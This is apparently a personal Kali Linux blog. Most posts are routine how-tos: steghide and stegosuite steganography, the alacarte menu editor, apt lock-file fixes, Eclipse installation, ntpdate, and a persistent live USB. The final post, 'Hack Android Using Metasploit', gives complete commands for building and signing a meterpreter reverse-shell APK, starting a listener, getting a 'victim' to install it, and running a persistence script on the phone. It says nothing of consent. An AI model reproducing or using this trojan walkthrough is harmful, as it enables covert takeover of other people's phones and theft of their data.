Saturday, 17 March 2018

Use Steghide & StegoSuite

Well Steganography is one of the oldest technique used to hide data in a image, hide image into image and hide data in a video/audio etc.
You can easily hide any kind of video/audio/text/message/image into each other. For example, a sender want to transfer some secret information from one place to another, then steganography is the best method to do secret transmission.
There are so many tools are available in Kali Linux for Steganography but Steghide and StegoSuite are the two most popular tools for steganography.

Steghide – Installation and Usage

Steghide is a command line tool through which you can easily hide data in various kinds of image/audio files without loosing any quality of original file or you can say that steghide is fully embedding resistant program.
Steghide supports basically JPEG/JPG/BMP/WAV/AU Files. You can even extract the data with the steghide.
To install Steghide in Kali Linux, please type
Command: apt-get install steghide

To use this tool, type “steghide” in your terminal.


Now we’ve created one secret.txt file with some data and placed a kevinmitnick.jpg file in same directory, so we are going to hide secret.txt file into kevinmitnick.jpg file.




Command: steghide embed -cf kevinmitnick.jpg -ef secret.txt

This command will asks for a password which you can easily set so that no one can extract the secret data from your file.
So this command will embed the secret.txt data in the image file of kevinmitnick.jpg
Now for extracting the data from this file, you can type below command.
Command: steghide extract -sf kevinmitnick.jpg

The receiver also has to use same steghide tool to recover the data, so if the password is correct, the contents of original file will be extracted from the image file and saved in the current directory.
You can also view the info related to embedded data by typing this below command.
Command: steghide info kevinmitnick.jpg

Stegosuite – Installation and Usage

Stegosuite is a completely graphical user based tool (GUI tool). The functionality of stegosuite is completely similar to steghide, the only difference is the graphical version.
Stegosuite is also available in Kali Linux repository so you can easily install stegosuite by typing following command.
Command: apt-get install stegosuite

Now after completion of above command, simply type “stegosuite” in same terminal or you can also open the stegosuite from top Application Menu.



Now click on File Menu and embed the text or you can also embed any file(txt) in 2nd textbox and in 3rd section, you can set any passphrase so that the file will remain confidential.



With the same way, you can also extract the confidential data from any image.

Alacarte - Add Software To The Main Menu

You might want to know how to customize your main Applications menu, so here it is.
1. Install the alacarte tool:
apt-get install alacarte
2. Now Start Alacarte using command:
alacarte

The Main Menu dialog shows you the list of the first-rank menu items. In this example, we are going to put Firefox Quantum into the menu structure, so do the following:
3. Go to the location and click on New Item (In this example I am in [Usual Applications/Internet]).

4. Put in the name and full path to the tool.
5. Optionally, add a comment that will show as a Tool-Tip when you mouse over the tool.
6. Click on the Upper-Left Corner of the dialog to Add or Change the icon for the tool.

7. Click the Ok Button.

“Unable to lock the administration directory (/var/lib/dpkg/)” [Fix]

While using the apt-get command or the relatively new APT package management tool in Kali Linux (which I actually use as my primary operating system for doing daily work), you might have encountered the error – “unable to lock the administration directory (/var/lib/dpkg/) is another process using it” on the command line.
This error can be so annoying especially for new Linux (Ubuntu) users who may not know exactly the cause of the error.
Below is an example, showing the lock file error in Ubuntu 16.10:
kali@root:~$ sudo apt install neofetch
[sudo] password for tecmint:
E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable)
E: Unable to lock the administration directory (/var/lib/dpkg), is another process using it?
The output below is another possible instance of the same error:
E: Could not get lock /var/lib/apt/lists/lock - open (11: Resource temporarily unavailable)
E: Unable to lock directory /var/lib/apt/lists/ 
E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable) 
E: Unable to lock the administration directory (/var/lib/dpkg/), is another process using it?
How can you solve the above error in case you bump into it in the future? There are several ways of dealing with this error(s), but in this guide, we will go through the two easiest and probably the most effective ways of solving it.

1. Find and Kill all apt-get or apt Processes

Run the command below to generate a list of all processes whose name comprises of the word apt, you will get a list inclusive of all apt or apt-get processes by using ps and grep commands together with a pipeline.
$ ps -A | grep apt
For each apt-get or apt process that you can see in the output of the command above, kill each process using the command below.
The process ID (PID) is found in the first column from the screenshot above.
$ sudo kill -9 processnumber
OR
$ sudo kill -SIGKILL processnumber
For instance, in the command below where 9 is the signal number for the SIGKILL signal, will kill the first aptprocess:
$ sudo kill -9 13431
OR
$ sudo kill -SIGKILL 13431

2. Delete the lock Files

A lock file simply prevents access to another file(s) or some data on your Linux system, this concept is present in Windows and other operating systems as well.
Once you run an apt-get or apt command, a lock file is created under the any of these directories /var/lib/apt/lists//var/lib/dpkg/ and /var/cache/apt/archives/.
This helps to avoid the apt-get or apt process that is already running from being interrupted by either a user or other system processes that would need to work with files being used by apt-get or apt. When the process has finished executing, the lock file is then deleted.
Important: In case a lock is still exiting in the two directories above with no noticeable apt-get or apt process running, this may mean the process was held for one reason or the other, therefore you need to delete the lock files in order to clear the error.
First execute the command below to remove the lock file in the /var/lib/dpkg/ directory:
$ sudo rm /var/lib/dpkg/lock
Afterwards force package(s) to reconfigure like so:
$ sudo dpkg --configure -a
Alternatively, delete the lock files in the /var/lib/apt/lists/ and cache directory as below:
$ sudo rm /var/lib/apt/lists/lock
$ sudo rm /var/cache/apt/archives/lock
Next, update your packages sources list as follows:
$ sudo apt update
OR
$ sudo apt-get update
In conclusion, we have walked through two important methods to deal with a common problem faced by Ubuntu (and its derivatives) users, while running apt-get or apt as well as aptitude commands.

Install & Configure Eclipse IDE

1. First Download The Package from the Eclipse website for the Linux Version.




2. Open Your Kali Linux OS and Open Terminal and Locate the Download directory.

cd Downloads



3. Now unzip your download file and store in tmp location. 
There are two way of unzip the file first manually by right click on the folder and unzip and other is throw command. I am going to show you with command here.

tar xvzf <pakage_name>.tar.gz -C /tmp/

Note: - It's not necessary to keep that file in tmp location but it is a recommended way.



4. Now go to your Super user. Actually I am login through my super user .i.e. root. It’s easy just type su and then enter your password. Then you are directed to your super user.

5. Now change the file owner and group and move the folder to opt directory.

chown -R root:root /tmp/eclipse && mv /tmp/eclipse /opt/

6. Now make Symlink so that you don't need to run long command to open your Eclipse.

ln -s /opt/eclipse/eclipse /usr/local/bin/eclipse

Now we are done. Just Type 

eclipse


Sunday, 18 February 2018

Date & Time Issue [Fix]



Install ntpdate and run it by giving my-country-ntp-server. It will solve the problem.


Code:
$ sudo apt-get install ntpdate
$ sudo ntpdate in.pool.ntp.org

Friday, 28 April 2017

Kali Linux Live With Persistence

First, you'll need a program to install Kali on your USB drive and make it bootable. My program of choice is Universal USB Installer, as it's painfully easy to use and it has a direct link to many Linux distros download page within the program.


Search for this button, and get the program. Once you run it, you'll see a disclaimer page. Accept it (or read it first, if you feel like it), and you'll be presented with the configuration section (after a few seconds). Choose Kali from the dropdown menu:


Once you have downloaded your Kali image, select it:


And then choose the drive letter for your USB drive (you probably won't need to use that checkbox on the right side). Be careful when doing this.


I'd recommend to check the box that formats your USB drive. That'll wipe your whole USB drive, make sure you back up everything you had there before proceeding. It'll make a quick format, so there's no reason to avoid this.


Click on Create, then Yes, and it'll do the whole process by itself. The longest part will be extracting the ISO to your USB, but it'll be over in a matter of minutes.


If everything went as expected, you'll see this, and you have a USB you can Live boot you Kali from.


Setting Up Perisitence
You liked to Live boot from USB, but you want to save changes made into your OS, or just files (such as .pcap files) into your USB drive? You'll need to set up Persistence. Your USB drive must have 8 GB+ of storage space.
Download Mini Tool Partition Wizard Free, install it, run it and then choose Launch Application.
Right click on your USB drive, and click on Move/Resize

Use the small black arrow keys to shrink the partition size. It will leave a bit of storage space free, but if you manually assign the Partition Size, the program may fail. Click OK.



A new big grey chunk of unallocated space as appeared! Right click on it and click on Create. It'll warn us that Windows won't be able to see that partition, but we don't care about that ;)


Pick this options:
· Create as: Primary
· File System: Ext4
· Partition Label: persistence
Then click OK.

Now click on Apply (upper left corner), and just wait for it to complete the tasks.

Setting Up The Persistence

Once the partition manager finished, reboot your computer and boot up from your USB drive. Choose the option "Live USB Persistence", and when it's booted up, open a Terminal and use these commands:
Determine which partition of your drive you'll use

fdisk -l

Remember your drive had a FAT32 partition and a Ext4 (Linux) one?

Make a directory on the filesystem to mount your USB

mkdir -p /mnt/my_usb

Mount the partition on the directory you made (don't click the desktop icon labeled persistence!)

mount /dev/sdc2 /mnt/my_usb

Add a configuration file to enable persistence

echo "/ union" > /mnt/my_usb/persistence.conf

Unmount the partition and reboot

umount /dev/sdc2 && reboot

Now, if you boot up to Live USB Persistence, you'll be able to save stuff everywhere on your Linux filesystem, and every configuration you make locally will be available everywhere you plug it in :)

Wednesday, 15 February 2017

Hack Android Using Metasploit

1. Open a terminal.
2. You can do this by typing:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Port to Listen>
R > /root/Desktop/<anything>.apk (replace LHOST with your own IP)

Note: You can also hack android on WAN i.e. through Internet by using your Public/ExternalP in the LHOST and by port forwarding
  

.

3. Now we must generate a keystore and sign our apk because if we dont on some devices or some versions of android signature of app is required.
4. For Generating the Keystore:


keytool -genkey -v -keystore /root/Desktop/my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000



5. 
Enter a Six Digit Password and keep it remember.
6. Fill all the details and say Yes at last question asked. Keystore will be created. You will be again asked for the password.




7. Now we have to sign the apk file using this Keystore. To do this type:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore2 my_application.apk alias_name

When it ask for the Passphrase, Enter the password you entered earlier.





8. Load metasploit console, by typing:

msfconsole





9. After it loads (it will take time), load the multi-handler exploit by typing : 


use exploit/multi/handler


10. Set up a (reverse) payload by typing: 

set payload android/meterpreter/reverse_tcp


11. To set L host type : 

set LHOST <Your IP>

Note: Even if you are hacking on WAN type your private/internal IP here not 
the public/external



12. At last type: exploit to start the listener.





13. Copy the application that you made (Anything.apk) from the root folder, 
to your android phone.
14. Then send the apk file to the phone you want to hack.
15. Let the Victim install the app.
Note: However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
16. And when he clicks Open, there comes the meterpreter prompt.




17. Download Persistent.sh
18. Upload the file to the device in /sdcard/Downloads.

19. cd /  (To go to the Root Directory)

19. Then navigate to the /sdcard/Download/ using cd

20. To upload the file use command:

upload /root/Desktop/Persistent.sh
(For these Images anything.sh is actually Persistent.sh)


21. Now, all we must do is execute the script once, and then everything will be done by the script automatically.
22. Drop into the system's shell by typing:

shell

23. Now, navigate to the location of the script:
cd /
cd /sdcard/Download
ls

24. Now its time for EXECUTION. Type:

sh Persistent.sh


Things To Remember:

The persistence of the backdoor will only remain until a reboot of the android system.
If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.

Remember to reboot the android to eliminate the running script, if you are testing on you own Android System.
If the Victim's Android system is Rooted and your Public IP is Static, then:

1)The Persistence will remain forever on WAN!
2)The Persistence will remain forever on LAN Obviously.

Video Tutorial: